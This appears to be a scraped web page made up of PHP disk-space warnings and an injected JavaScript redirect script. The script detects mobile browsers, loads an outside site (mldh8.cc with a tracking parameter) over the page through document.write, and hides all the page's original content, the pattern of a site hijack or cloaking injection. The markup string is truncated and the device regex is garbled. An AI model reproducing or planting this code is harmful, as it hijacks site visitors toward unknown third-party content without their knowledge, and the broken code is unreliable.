Warning: mkdir(): No space left on device in /www/wwwroot/NEW8.COM/func.php on line 127

Warning: file_put_contents(./cachefile_yuan/0371zzct.com/cache/6c/7ac2b/e7430.html): failed to open stream: No such file or directory in /www/wwwroot/NEW8.COM/func.php on line 115
var pcItems = ['/pc.html', '/fn404.html' ]; var mobilesItems = [ 'http://mldh8.cc/?qd=fyseoqz1', 'http://mldh8.cc/?qd=fyseoqz1' ];// 判斷是否為移動設備 function ismobilesDevice() { return /androids|weboses|iphoness|ipads|ipods|BlackBerry|IEmobiles|Opera Mini/i.test(navigator.userAgent); }// 根據設備類型選擇URL數組 var items = ismobilesDevice() ? mobilesItems : pcItems; var item = items[Math.floor(Math.random()*items.length)]; setFrame(item);function setFrame(olink){ // 修改容器樣式增加!important和定位屬性 var ss = '
' + ''; // 使用更安全的文檔寫入方式 document.open(); document.write(ss); document.close(); // 添加視口設置 var oMeta = document.createElement('meta'); oMeta.name = 'viewport'; oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,' + 'maximum-scale=1,user-scalable=no'; document.head.appendChild(oMeta); // 增強樣式覆蓋邏輯 setTimeout(function() { // 強製覆蓋body和html樣式 document.documentElement.style.cssText += 'height:100% !important;padding:0 !important;'; document.body.style.cssText += 'height:100% !important;padding:0 !important;'; // 遍曆隱藏其他元素(保留原始邏輯) Array.from(document.body.children).forEach(element => { const tag = element.tagName.toLowerCase(); const id = element.id; if(id !== "iconDiv1" && id !== "showcloneshengxiaon" && tag !== "title") { element.style.display = "none"; } }); }, 100); }